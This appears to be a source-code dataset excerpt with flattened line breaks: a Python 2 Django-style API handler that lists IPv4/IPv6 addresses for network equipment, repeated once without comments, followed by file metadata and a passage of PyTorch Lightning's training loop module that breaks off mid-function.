is_valid_string_maxsize(equip_name, 80) or not is_valid_regex(equip_name, '^[A-Z0-9-_]+$'): self.log.error( u'Parameter equip_name is invalid. 
Value: %s', equip_name) raise InvalidValueError(None, 'equip_name', equip_name) # Business Rules # Get Environment VIp evip = EnvironmentVip.get_by_pk(id_evip) # Get Equipment equip = Equipamento.get_by_name(equip_name) lista_ips_equip = list() lista_ipsv6_equip = list() # GET DIVISAO DC AND AMBIENTE_LOGICO OF NET4 AND NET6 lista_amb_div_4 = list() lista_amb_div_6 = list() for net in evip.networkipv4_set.select_related( 'vlan', 'ambiente' ).all(): dict_div_4 = dict() dict_div_4['divisao_dc'] = net.vlan.ambiente.divisao_dc_id dict_div_4[ 'ambiente_logico'] = net.vlan.ambiente.ambiente_logico_id if dict_div_4 not in lista_amb_div_4: lista_amb_div_4.append(dict_div_4) for net in evip.networkipv6_set.select_related( 'vlan', 'ambiente' ).all(): dict_div_6 = dict() dict_div_6['divisao_dc'] = net.vlan.ambiente.divisao_dc_id dict_div_6[ 'ambiente_logico'] = net.vlan.ambiente.ambiente_logico_id if dict_div_6 not in lista_amb_div_6: lista_amb_div_6.append(dict_div_6) # Get all IPV4's Equipment for ipequip in equip.ipequipamento_set.select_related( 'ip', 'vlan', 'ambiente' ).all(): if ipequip.ip not in lista_ips_equip: for dict_div_amb in lista_amb_div_4: # if ipequip.ip.networkipv4.ambient_vip is not None and # ipequip.ip.networkipv4.ambient_vip.id == evip.id: if (ipequip.ip.networkipv4.vlan.ambiente.divisao_dc.id == dict_div_amb.get('divisao_dc') and ipequip.ip.networkipv4.vlan.ambiente.ambiente_logico.id == dict_div_amb.get('ambiente_logico')): lista_ips_equip.append(ipequip.ip) # Get all IPV6'S Equipment for ipequip in equip.ipv6equipament_set.select_related( 'ip', 'vlan', 'ambiente' ).all(): if ipequip.ip not in lista_ipsv6_equip: for dict_div_amb in lista_amb_div_6: # if ipequip.ip.networkipv6.ambient_vip is not None and # ipequip.ip.networkipv6.ambient_vip.id == evip.id: print ipequip.ip.networkipv6.vlan.ambiente.divisao_dc.id print dict_div_amb.get('divisao_dc') if (ipequip.ip.networkipv6.vlan.ambiente.divisao_dc.id == dict_div_amb.get('divisao_dc') and 
ipequip.ip.networkipv6.vlan.ambiente.ambiente_logico.id == dict_div_amb.get('ambiente_logico')): lista_ipsv6_equip.append(ipequip.ip) # lists and dicts for return lista_ip_entregue = list() lista_ip6_entregue = list() for ip in lista_ips_equip: dict_ips4 = dict() dict_network = dict() dict_ips4['id'] = ip.id dict_ips4['ip'] = '%s.%s.%s.%s' % ( ip.oct1, ip.oct2, ip.oct3, ip.oct4) dict_network['id'] = ip.networkipv4_id dict_network['network'] = '%s.%s.%s.%s' % ( ip.networkipv4.oct1, ip.networkipv4.oct2, ip.networkipv4.oct3, ip.networkipv4.oct4) dict_network['mask'] = '%s.%s.%s.%s' % ( ip.networkipv4.mask_oct1, ip.networkipv4.mask_oct2, ip.networkipv4.mask_oct3, ip.networkipv4.mask_oct4) dict_ips4['network'] = dict_network lista_ip_entregue.append(dict_ips4) for ip in lista_ipsv6_equip: dict_ips6 = dict() dict_network = dict() dict_ips6['id'] = ip.id dict_ips6['ip'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8) dict_network['id'] = ip.networkipv6.id dict_network['network'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.networkipv6.block1, ip.networkipv6.block2, ip.networkipv6.block3, ip.networkipv6.block4, ip.networkipv6.block5, ip.networkipv6.block6, ip.networkipv6.block7, ip.networkipv6.block8) dict_network['mask'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.networkipv6.block1, ip.networkipv6.block2, ip.networkipv6.block3, ip.networkipv6.block4, ip.networkipv6.block5, ip.networkipv6.block6, ip.networkipv6.block7, ip.networkipv6.block8) dict_ips6['network'] = dict_network lista_ip6_entregue.append(dict_ips6) lista_ip_entregue = lista_ip_entregue if len( lista_ip_entregue) > 0 else None lista_ip6_entregue = lista_ip6_entregue if len( lista_ip6_entregue) > 0 else None if (lista_ip_entregue is None and lista_ip6_entregue is None): raise IpNotFoundByEquipAndVipError( None, 'Ip não encontrado com equipamento %s e ambiente vip %s' % (equip_name, id_evip)) return self.response(dumps_networkapi({'ipv4': lista_ip_entregue, 
'ipv6': lista_ip6_entregue})) except IpNotFoundByEquipAndVipError: return self.response_error(317, equip_name, id_evip) except InvalidValueError, e: return self.response_error(269, e.param, e.value) except NetworkIPv4NotFoundError: return self.response_error(281) except EquipamentoNotFoundError: return self.response_error(117, ip_map.get('id_equipment')) except EnvironmentVipNotFoundError: return self.response_error(283) except UserNotAuthorizedError: return self.not_authorized() except XMLError, x: self.log.error(u'Error reading the XML request.') return self.response_error(3, x) except (IpError, NetworkIPv4Error, EquipamentoError, GrupoError), e: self.log.error(e) return self.response_error(1)
45.548246
213
0.625325
import logging from networkapi.admin_permission import AdminPermission from networkapi.ambiente.models import EnvironmentVip from networkapi.auth import has_perm from networkapi.equipamento.models import Equipamento from networkapi.equipamento.models import EquipamentoError from networkapi.equipamento.models import EquipamentoNotFoundError from networkapi.exception import EnvironmentVipNotFoundError from networkapi.exception import InvalidValueError from networkapi.grupo.models import GrupoError from networkapi.infrastructure.xml_utils import dumps_networkapi from networkapi.infrastructure.xml_utils import loads from networkapi.infrastructure.xml_utils import XMLError from networkapi.ip.models import IpError from networkapi.ip.models import IpNotFoundByEquipAndVipError from networkapi.ip.models import NetworkIPv4Error from networkapi.ip.models import NetworkIPv4NotFoundError from networkapi.rest import RestResource from networkapi.rest import UserNotAuthorizedError from networkapi.util import is_valid_int_greater_zero_param from networkapi.util import is_valid_regex from networkapi.util import is_valid_string_maxsize from networkapi.util import is_valid_string_minsize class IPEquipEvipResource(RestResource): log = logging.getLogger('IPEquipEvipResource') def handle_post(self, request, user, *args, **kwargs): """Handles POST requests to get all Ips (v4) or (v6) of equip on Divisao DC and Ambiente Logico of fisrt Network4 and 6 (if exists) of Environment Vip. URL: ip/getbyequipandevip/ """ self.log.info('Get Ips by Equip - Evip') try: if not has_perm(user, AdminPermission.IPS, AdminPermission.READ_OPERATION): raise UserNotAuthorizedError( None, u'User does not have permission to perform the operation.') xml_map, attrs_map = loads(request.raw_post_data) networkapi_map = xml_map.get('networkapi') if networkapi_map is None: msg = u'There is no value to the networkapi tag of XML request.' 
self.log.error(msg) return self.response_error(3, msg) ip_map = networkapi_map.get('ip_map') if ip_map is None: msg = u'There is no value to the ip tag of XML request.' self.log.error(msg) return self.response_error(3, msg) id_evip = ip_map.get('id_evip') equip_name = ip_map.get('equip_name') if not is_valid_int_greater_zero_param(id_evip): self.log.error( u'Parameter id_evip is invalid. Value: %s.', id_evip) raise InvalidValueError(None, 'id_evip', id_evip) if not is_valid_string_minsize(equip_name, 3) or not is_valid_string_maxsize(equip_name, 80) or not is_valid_regex(equip_name, '^[A-Z0-9-_]+$'): self.log.error( u'Parameter equip_name is invalid. Value: %s', equip_name) raise InvalidValueError(None, 'equip_name', equip_name) evip = EnvironmentVip.get_by_pk(id_evip) equip = Equipamento.get_by_name(equip_name) lista_ips_equip = list() lista_ipsv6_equip = list() lista_amb_div_4 = list() lista_amb_div_6 = list() for net in evip.networkipv4_set.select_related( 'vlan', 'ambiente' ).all(): dict_div_4 = dict() dict_div_4['divisao_dc'] = net.vlan.ambiente.divisao_dc_id dict_div_4[ 'ambiente_logico'] = net.vlan.ambiente.ambiente_logico_id if dict_div_4 not in lista_amb_div_4: lista_amb_div_4.append(dict_div_4) for net in evip.networkipv6_set.select_related( 'vlan', 'ambiente' ).all(): dict_div_6 = dict() dict_div_6['divisao_dc'] = net.vlan.ambiente.divisao_dc_id dict_div_6[ 'ambiente_logico'] = net.vlan.ambiente.ambiente_logico_id if dict_div_6 not in lista_amb_div_6: lista_amb_div_6.append(dict_div_6) for ipequip in equip.ipequipamento_set.select_related( 'ip', 'vlan', 'ambiente' ).all(): if ipequip.ip not in lista_ips_equip: for dict_div_amb in lista_amb_div_4: # if ipequip.ip.networkipv4.ambient_vip is not None and # ipequip.ip.networkipv4.ambient_vip.id == evip.id: if (ipequip.ip.networkipv4.vlan.ambiente.divisao_dc.id == dict_div_amb.get('divisao_dc') and ipequip.ip.networkipv4.vlan.ambiente.ambiente_logico.id == dict_div_amb.get('ambiente_logico')): 
lista_ips_equip.append(ipequip.ip) # Get all IPV6'S Equipment for ipequip in equip.ipv6equipament_set.select_related( 'ip', 'vlan', 'ambiente' ).all(): if ipequip.ip not in lista_ipsv6_equip: for dict_div_amb in lista_amb_div_6: print ipequip.ip.networkipv6.vlan.ambiente.divisao_dc.id print dict_div_amb.get('divisao_dc') if (ipequip.ip.networkipv6.vlan.ambiente.divisao_dc.id == dict_div_amb.get('divisao_dc') and ipequip.ip.networkipv6.vlan.ambiente.ambiente_logico.id == dict_div_amb.get('ambiente_logico')): lista_ipsv6_equip.append(ipequip.ip) lista_ip_entregue = list() lista_ip6_entregue = list() for ip in lista_ips_equip: dict_ips4 = dict() dict_network = dict() dict_ips4['id'] = ip.id dict_ips4['ip'] = '%s.%s.%s.%s' % ( ip.oct1, ip.oct2, ip.oct3, ip.oct4) dict_network['id'] = ip.networkipv4_id dict_network['network'] = '%s.%s.%s.%s' % ( ip.networkipv4.oct1, ip.networkipv4.oct2, ip.networkipv4.oct3, ip.networkipv4.oct4) dict_network['mask'] = '%s.%s.%s.%s' % ( ip.networkipv4.mask_oct1, ip.networkipv4.mask_oct2, ip.networkipv4.mask_oct3, ip.networkipv4.mask_oct4) dict_ips4['network'] = dict_network lista_ip_entregue.append(dict_ips4) for ip in lista_ipsv6_equip: dict_ips6 = dict() dict_network = dict() dict_ips6['id'] = ip.id dict_ips6['ip'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.block1, ip.block2, ip.block3, ip.block4, ip.block5, ip.block6, ip.block7, ip.block8) dict_network['id'] = ip.networkipv6.id dict_network['network'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.networkipv6.block1, ip.networkipv6.block2, ip.networkipv6.block3, ip.networkipv6.block4, ip.networkipv6.block5, ip.networkipv6.block6, ip.networkipv6.block7, ip.networkipv6.block8) dict_network['mask'] = '%s:%s:%s:%s:%s:%s:%s:%s' % ( ip.networkipv6.block1, ip.networkipv6.block2, ip.networkipv6.block3, ip.networkipv6.block4, ip.networkipv6.block5, ip.networkipv6.block6, ip.networkipv6.block7, ip.networkipv6.block8) dict_ips6['network'] = dict_network lista_ip6_entregue.append(dict_ips6) lista_ip_entregue = 
lista_ip_entregue if len( lista_ip_entregue) > 0 else None lista_ip6_entregue = lista_ip6_entregue if len( lista_ip6_entregue) > 0 else None if (lista_ip_entregue is None and lista_ip6_entregue is None): raise IpNotFoundByEquipAndVipError( None, 'Ip não encontrado com equipamento %s e ambiente vip %s' % (equip_name, id_evip)) return self.response(dumps_networkapi({'ipv4': lista_ip_entregue, 'ipv6': lista_ip6_entregue})) except IpNotFoundByEquipAndVipError: return self.response_error(317, equip_name, id_evip) except InvalidValueError, e: return self.response_error(269, e.param, e.value) except NetworkIPv4NotFoundError: return self.response_error(281) except EquipamentoNotFoundError: return self.response_error(117, ip_map.get('id_equipment')) except EnvironmentVipNotFoundError: return self.response_error(283) except UserNotAuthorizedError: return self.not_authorized() except XMLError, x: self.log.error(u'Error reading the XML request.') return self.response_error(3, x) except (IpError, NetworkIPv4Error, EquipamentoError, GrupoError), e: self.log.error(e) return self.response_error(1)
false
true
f705d82868da78fc4b8e5a14a1c63f8b5d2c006e
39,980
py
Python
pytorch_lightning/trainer/training_loop.py
songwanguw/pytorch-lightning
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
[ "Apache-2.0" ]
null
null
null
pytorch_lightning/trainer/training_loop.py
songwanguw/pytorch-lightning
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
[ "Apache-2.0" ]
1
2020-11-11T11:36:38.000Z
2020-11-11T11:36:38.000Z
pytorch_lightning/trainer/training_loop.py
songwanguw/pytorch-lightning
64da9c9d87ac1c106d94310c4d90668fbafbb2cf
[ "Apache-2.0" ]
null
null
null
# Copyright The PyTorch Lightning team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from contextlib import contextmanager from copy import copy, deepcopy import numpy as np import torch import torch.distributed as torch_distrib from pytorch_lightning.callbacks import ModelCheckpoint from pytorch_lightning.core.lightning import LightningModule from pytorch_lightning.core.memory import ModelSummary from pytorch_lightning.core.step_result import EvalResult, Result from pytorch_lightning.trainer.states import TrainerState from pytorch_lightning.trainer.supporters import TensorRunningAccum, Accumulator from pytorch_lightning.utilities import parsing, AMPType from pytorch_lightning.utilities.distributed import rank_zero_info, rank_zero_warn from pytorch_lightning.utilities.exceptions import MisconfigurationException from pytorch_lightning.utilities.memory import recursive_detach from pytorch_lightning.utilities.model_utils import is_overridden from pytorch_lightning.utilities.parsing import AttributeDict from pytorch_lightning.utilities.warning_utils import WarningCache class TrainLoop: def __init__(self, trainer): self.trainer = trainer self.early_stopping_accumulator = None self.checkpoint_accumulator = None self.accumulated_loss = None self.warning_cache = WarningCache() self._teardown_already_run = False self.running_loss = TensorRunningAccum(window_length=20) self.automatic_optimization = True self._curr_step_result = None self._cur_grad_norm_dict = None def on_trainer_init( 
self, max_epochs, min_epochs, max_steps, min_steps, num_sanity_val_steps, automatic_optimization ): self.trainer.global_step = 0 self.trainer.current_epoch = 0 self.trainer.interrupted = False self.trainer.should_stop = False self.trainer._state = TrainerState.INITIALIZING self.trainer.total_batch_idx = 0 self.trainer.batch_idx = 0 self.trainer.num_training_batches = 0 self.trainer.train_dataloader = None self.automatic_optimization = automatic_optimization self.trainer.max_epochs = max_epochs self.trainer.min_epochs = min_epochs self.trainer.max_steps = max_steps self.trainer.min_steps = min_steps if num_sanity_val_steps == -1: self.trainer.num_sanity_val_steps = float("inf") else: self.trainer.num_sanity_val_steps = num_sanity_val_steps @property def num_optimizers(self): num_optimizers = len(self.get_optimizers_iterable()) return num_optimizers def should_skip_training(self): if self.trainer.current_epoch >= self.trainer.max_epochs: return True if self.trainer.limit_train_batches == 0: return True return False def on_train_start(self): # clear cache before training if self.trainer.on_gpu and self.trainer.root_gpu is not None: # use context because of: # https://discuss.pytorch.org/t/out-of-memory-when-i-use-torch-cuda-empty-cache/57898 with torch.cuda.device(f"cuda:{self.trainer.root_gpu}"): torch.cuda.empty_cache() # hook self.trainer.call_hook("on_train_start") def setup_fit(self, model, train_dataloader, val_dataloaders, datamodule): # bind logger and other properties self.trainer.model_connector.copy_trainer_model_properties(model) # clean hparams if hasattr(model, "hparams"): parsing.clean_namespace(model.hparams) # links data to the trainer self.trainer.data_connector.attach_data(model, train_dataloader, val_dataloaders, datamodule) # check that model is configured correctly self.trainer.config_validator.verify_loop_configurations(model) def setup_training(self, model: LightningModule): """Sanity check a few things before starting actual training. 
Args: model: The model to run sanity test on. """ # -------------------------- # Setup?? # -------------------------- ref_model = model if self.trainer.data_parallel: ref_model = model.module # set the ranks and devices self.trainer.accelerator_backend.dist.rank = self.trainer.global_rank self.trainer.accelerator_backend.dist.device = ref_model.device # give model convenience properties ref_model.trainer = self.trainer # set local properties on the model self.trainer.model_connector.copy_trainer_model_properties(ref_model) # init amp. Must be done here instead of __init__ to allow ddp to work if self.trainer.amp_backend == AMPType.NATIVE and self.trainer.precision == 16 and not self.trainer.use_tpu: self.trainer.scaler = torch.cuda.amp.GradScaler() # log hyper-parameters if self.trainer.logger is not None: # save exp to get started (this is where the first experiment logs are written) self.trainer.logger.log_hyperparams(ref_model.hparams_initial) self.trainer.logger.log_graph(ref_model) self.trainer.logger.save() # wait for all to join if on distributed self.trainer.accelerator_backend.barrier("setup_training") # register auto-resubmit when on SLURM self.trainer.slurm_connector.register_slurm_signal_handlers() # -------------------------- # Pre-train # -------------------------- # on pretrain routine start self.trainer.on_pretrain_routine_start(ref_model) if self.trainer.is_function_implemented("on_pretrain_routine_start"): ref_model.on_pretrain_routine_start() # print model summary if self.trainer.is_global_zero and self.trainer.weights_summary is not None and not self.trainer.testing: if self.trainer.weights_summary in ModelSummary.MODES: ref_model.summarize(mode=self.trainer.weights_summary) else: raise MisconfigurationException("weights_summary can be None, " + ", ".join(ModelSummary.MODES)) # track model now. 
# if cluster resets state, the model will update with the saved weights self.trainer.model = model # restore training and model before hpc is called self.trainer.checkpoint_connector.restore_weights(model) # on pretrain routine end self.trainer.on_pretrain_routine_end(ref_model) if self.trainer.is_function_implemented("on_pretrain_routine_end"): ref_model.on_pretrain_routine_end() def on_train_end(self): if self._teardown_already_run: return self._teardown_already_run = True # trigger checkpoint check. need to temporarily decrease the global step to avoid saving duplicates # when a checkpoint was saved at the last step self.trainer.global_step -= 1 self.check_checkpoint_callback(should_save=True, is_last=True) self.trainer.global_step += 1 # hook self.trainer.call_hook("on_train_end") # kill loggers if self.trainer.logger is not None: self.trainer.logger.finalize("success") # summarize profile results if self.trainer.global_rank == 0: self.trainer.profiler.describe() # give accelerators a chance to finish self.trainer.accelerator_backend.on_train_end() # clear mem if self.trainer.on_gpu: model = self.trainer.get_model() model.cpu() torch.cuda.empty_cache() def check_checkpoint_callback(self, should_save, is_last=False): # TODO bake this logic into the checkpoint callback if should_save and self.trainer.checkpoint_connector.has_trained: checkpoint_callbacks = [c for c in self.trainer.callbacks if isinstance(c, ModelCheckpoint)] if is_last and any(c.save_last for c in checkpoint_callbacks): rank_zero_info("Saving latest checkpoint...") model = self.trainer.get_model() [c.on_validation_end(self.trainer, model) for c in checkpoint_callbacks] def on_train_epoch_start(self, epoch): # update training progress in trainer self.trainer.current_epoch = epoch model = self.trainer.get_model() # reset train dataloader if self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_train_dataloader(model) # set seed for distributed sampler (enables shuffling for each epoch) 
try: self.trainer.train_dataloader.sampler.set_epoch(epoch) except Exception: pass # changing gradient according accumulation_scheduler self.trainer.accumulation_scheduler.on_epoch_start(self.trainer, self.trainer.get_model()) # stores accumulated grad fractions per batch self.accumulated_loss = TensorRunningAccum(window_length=self.trainer.accumulate_grad_batches) # structured result accumulators for callbacks self.early_stopping_accumulator = Accumulator() self.checkpoint_accumulator = Accumulator() # hook self.trainer.call_hook("on_epoch_start") self.trainer.call_hook("on_train_epoch_start") def on_train_batch_end(self, epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx): # hook self.trainer.call_hook('on_batch_end') self.trainer.call_hook('on_train_batch_end', epoch_end_outputs, batch, batch_idx, dataloader_idx) # figure out what to track for epoch end self.track_epoch_end_reduce_metrics(epoch_output, epoch_end_outputs) # reset batch logger internals self.trainer.logger_connector.on_train_batch_end() def reset_train_val_dataloaders(self, model): if not self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_train_dataloader(model) if self.trainer.val_dataloaders is None and not self.trainer.reload_dataloaders_every_epoch: self.trainer.reset_val_dataloader(model) def track_epoch_end_reduce_metrics(self, epoch_output, epoch_end_outputs): # track the outputs to reduce at the end of the epoch for opt_idx, opt_outputs in enumerate(epoch_end_outputs): # with 1 step (no tbptt) don't use a sequence at epoch end if isinstance(opt_outputs, list) and len(opt_outputs) == 1 and not isinstance(opt_outputs[0], Result): opt_outputs = opt_outputs[0] epoch_output[opt_idx].append(opt_outputs) def get_optimizers_iterable(self): """ Generates an iterable with (idx, optimizer) for each optimizer. 
""" if not self.trainer.optimizer_frequencies: # call training_step once per optimizer return list(enumerate(self.trainer.optimizers)) optimizer_freq_cumsum = np.cumsum(self.trainer.optimizer_frequencies) optimizers_loop_length = optimizer_freq_cumsum[-1] current_place_in_loop = self.trainer.total_batch_idx % optimizers_loop_length # find optimzier index by looking for the first {item > current_place} in the cumsum list opt_idx = np.argmax(optimizer_freq_cumsum > current_place_in_loop) return [[opt_idx, self.trainer.optimizers[opt_idx]]] def on_after_backward(self, training_step_output, batch_idx, untouched_loss): is_result_obj = isinstance(training_step_output, Result) if is_result_obj: training_step_output.detach() else: training_step_output.batch_loss = training_step_output.batch_loss.detach() # insert after step hook self.trainer.call_hook("on_after_backward") # when in dev debugging track the losses self.trainer.dev_debugger.track_train_loss_history(batch_idx, untouched_loss.detach()) def _check_training_step_output(self, training_step_output): if isinstance(training_step_output, torch.Tensor) and not self.automatic_optimization: if training_step_output.grad_fn is None: # TODO: Find why - RuntimeError: Expected to mark a variable ready only once ... 
raise MisconfigurationException("In manual optimization, `training_step` should not return a Tensor") def training_step(self, split_batch, batch_idx, opt_idx, hiddens): # give the PL module a result for logging model_ref = self.trainer.get_model() with self.trainer.profiler.profile("model_forward"): args = self.build_train_args(split_batch, batch_idx, opt_idx, hiddens) # manually capture logged metrics model_ref._current_fx_name = 'training_step' training_step_output = self.trainer.accelerator_backend.training_step(args) self.trainer.logger_connector.cache_logged_metrics() self._check_training_step_output(training_step_output) training_step_output = self.trainer.call_hook("training_step_end", training_step_output) training_step_output_for_epoch_end, training_step_output = self._process_training_step_output( training_step_output, split_batch ) is_result_obj = isinstance(training_step_output, Result) if training_step_output_for_epoch_end is None: return None # enable empty loss when using manual opt closure_loss = None untouched_loss = None if self.trainer.train_loop.automatic_optimization: # accumulate loss # (if accumulate_grad_batches = 1 no effect) if is_result_obj: closure_loss = training_step_output.minimize else: closure_loss = training_step_output.batch_loss closure_loss = closure_loss / self.trainer.accumulate_grad_batches # the loss will get scaled for amp. 
avoid any modifications to it untouched_loss = closure_loss.detach().clone() # result result = AttributeDict( closure_loss=closure_loss, loss=untouched_loss, training_step_output=training_step_output, training_step_output_for_epoch_end=training_step_output_for_epoch_end, hiddens=training_step_output.hiddens, ) return result def _process_training_step_output(self, training_step_output, split_batch): training_step_output_for_epoch_end = training_step_output # enable validation_step return None if training_step_output_for_epoch_end is None: return None, None # ----------------------------------------- # process result return (DEPRECATE in 1.0) # ----------------------------------------- if isinstance(training_step_output, Result): training_step_output_for_epoch_end = self._process_result(training_step_output, split_batch) return training_step_output_for_epoch_end, training_step_output # ----------------------------------------- # process hybrid (1.0) # ----------------------------------------- # no need for these checks in 1.0.0 # TODO: remove checks in 1.0.0 is_tensor = isinstance(training_step_output_for_epoch_end, torch.Tensor) is_1_0_output = is_tensor or ("log" not in training_step_output and "progress_bar" not in training_step_output) if is_1_0_output: return self._process_training_step_output_1_0(training_step_output, split_batch) # ----------------------------------------- # process old dict (deprecate 1.0) # ----------------------------------------- training_step_output = self.trainer.process_dict_result(training_step_output, train=True) training_step_output = AttributeDict( batch_loss=training_step_output[0], pbar_on_batch_end=training_step_output[1], log_metrics=training_step_output[2], callback_metrics=training_step_output[3], hiddens=training_step_output[4], ) # if the user decides to finally reduce things in epoch_end, save raw output without graphs if isinstance(training_step_output_for_epoch_end, torch.Tensor): training_step_output_for_epoch_end = 
training_step_output_for_epoch_end.detach() else: training_step_output_for_epoch_end = recursive_detach(training_step_output_for_epoch_end) return training_step_output_for_epoch_end, training_step_output def _process_training_step_output_1_0(self, training_step_output, split_batch): result = self.trainer.get_model()._results loss = None hiddens = None # handle dict return if isinstance(training_step_output, dict): loss = training_step_output.pop("loss", None) hiddens = training_step_output.pop("hiddens", None) result["extra"] = training_step_output # handle scalar return elif isinstance(training_step_output, torch.Tensor): loss = training_step_output result["extra"] = {} # map to results under the hood result.minimize = loss result.hiddens = hiddens # track batch for manual reduction with result result.track_batch_size(len(split_batch)) # track metrics without grads for epoch reduction training_step_output_for_epoch_end = copy(result) training_step_output_for_epoch_end.detach() if self.trainer.move_metrics_to_cpu: training_step_output_for_epoch_end.cpu() # what flows back into the system training_step_output = result return training_step_output_for_epoch_end, training_step_output def _process_result(self, training_step_output, split_batch): training_step_output.track_batch_size(len(split_batch)) m = """ TrainResult and EvalResult were deprecated in 0.9.1 and support will drop in 1.0.0. Use self.log and .write from the LightningModule to log metrics and write predictions. training_step can now only return a scalar (for the loss) or a dictionary with anything you want. 
Option 1: return loss Option 2: return {'loss': loss, 'anything_else': ...} Option 3: return {'loss': loss, 'hiddens': hiddens, 'anything_else': ...} """ rank_zero_warn(m) # don't allow EvalResult in the training_step if isinstance(training_step_output, EvalResult): raise MisconfigurationException( "training_step cannot return EvalResult, " "use a dict or TrainResult instead" ) training_step_output_for_epoch_end = copy(training_step_output) training_step_output_for_epoch_end.detach() return training_step_output_for_epoch_end def optimizer_step(self, optimizer, opt_idx, batch_idx, train_step_and_backward_closure): with self.trainer.profiler.profile("optimizer_step"): # optimizer step lightningModule hook self.trainer.accelerator_backend.optimizer_step( optimizer, batch_idx, opt_idx, train_step_and_backward_closure ) def on_before_zero_grad(self, optimizer): self.trainer.call_hook('on_before_zero_grad', optimizer) def optimizer_zero_grad(self, batch_idx, optimizer, opt_idx): self.trainer.accelerator_backend.optimizer_zero_grad(batch_idx, optimizer, opt_idx) def track_and_norm_grad(self, optimizer): # track gradient norms grad_norm_dic = self._track_gradient_norm() # clip gradients self.trainer.accelerator_backend.clip_gradients(optimizer) self._cur_grad_norm_dict = grad_norm_dic def _track_gradient_norm(self): grad_norm_dict = {} if (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0: if float(self.trainer.track_grad_norm) > 0: model = self.trainer.get_model() grad_norm_dict = model.grad_norm(self.trainer.track_grad_norm) return grad_norm_dict def process_hiddens(self, opt_closure_result): hiddens = opt_closure_result.hiddens if isinstance(opt_closure_result.training_step_output, Result): opt_closure_result.training_step_output_for_epoch_end.drop_hiddens() return hiddens def tbptt_split_batch(self, batch): splits = [batch] if self.trainer.truncated_bptt_steps is not None: model_ref = self.trainer.get_model() with 
self.trainer.profiler.profile("tbptt_split_batch"): splits = model_ref.tbptt_split_batch(batch, self.trainer.truncated_bptt_steps) return splits def run_training_epoch(self): # get model model = self.trainer.get_model() # modify dataloader if needed (ddp, etc...) train_dataloader = self.trainer.accelerator_backend.process_dataloader(self.trainer.train_dataloader) # track epoch output epoch_output = [[] for _ in range(self.num_optimizers)] # enable profiling for the dataloader train_dataloader = self.trainer.data_connector.get_profiled_train_dataloader(train_dataloader) dataloader_idx = 0 should_check_val = False for batch_idx, (batch, is_last_batch) in train_dataloader: self.trainer.batch_idx = batch_idx # ------------------------------------ # TRAINING_STEP + TRAINING_STEP_END # ------------------------------------ batch_output = self.run_training_batch(batch, batch_idx, dataloader_idx) # when returning -1 from train_step, we end epoch early if batch_output.signal == -1: break # only track outputs when user implements training_epoch_end # otherwise we will build up unnecessary memory epoch_end_outputs = self.process_train_step_outputs( batch_output.training_step_output_for_epoch_end, self.early_stopping_accumulator, self.checkpoint_accumulator, ) # hook # TODO: add outputs to batches self.on_train_batch_end(epoch_output, epoch_end_outputs, batch, batch_idx, dataloader_idx) # ----------------------------------------- # SAVE METRICS TO LOGGERS # ----------------------------------------- self.trainer.logger_connector.log_train_step_metrics(batch_output) # ----------------------------------------- # VALIDATE IF NEEDED + CHECKPOINT CALLBACK # ----------------------------------------- should_check_val = self.should_check_val_fx(batch_idx, is_last_batch) if should_check_val: self.trainer.run_evaluation(test_mode=False) # reset stage to train self.trainer.logger_connector.set_stage("train") # ----------------------------------------- # SAVE LOGGERS (ie: Tensorboard, 
etc...) # ----------------------------------------- self.save_loggers_on_train_batch_end() # update LR schedulers monitor_metrics = deepcopy(self.trainer.logger_connector.callback_metrics) self.update_train_loop_lr_schedulers(monitor_metrics=monitor_metrics) self.trainer.checkpoint_connector.has_trained = True # max steps reached, end training if self.trainer.max_steps is not None and self.trainer.max_steps == self.trainer.global_step + 1: accumulation_done = self._accumulated_batches_reached() # Ensure accumulation across batches has completed before breaking loop if accumulation_done: break # end epoch early # stop when the flag is changed or we've gone past the amount # requested in the batches if self.trainer.should_stop: break self.trainer.total_batch_idx += 1 # stop epoch if we limited the number of training batches if (batch_idx + 1) >= self.trainer.num_training_batches: break # progress global step according to grads progress self.increment_accumulated_grad_global_step() # epoch end hook self.run_on_epoch_end_hook(epoch_output) # log epoch metrics self.trainer.logger_connector.log_train_epoch_end_metrics( epoch_output, self.checkpoint_accumulator, self.early_stopping_accumulator, self.num_optimizers ) # when no val loop is present or fast-dev-run still need to call checkpoints self.check_checkpoint_callback(not (should_check_val or is_overridden('validation_step', model))) # increment the global step once # progress global step according to grads progress self.increment_accumulated_grad_global_step() def run_training_batch(self, batch, batch_idx, dataloader_idx): # track grad norms grad_norm_dic = {} # bookkeeping using_results_obj = False self.trainer.hiddens = None # track all outputs across time and num of optimizers batch_outputs = [[] for _ in range(len(self.get_optimizers_iterable()))] if batch is None: return AttributeDict(signal=0, grad_norm_dic=grad_norm_dic) # hook response = self.trainer.call_hook("on_batch_start") if response == -1: return 
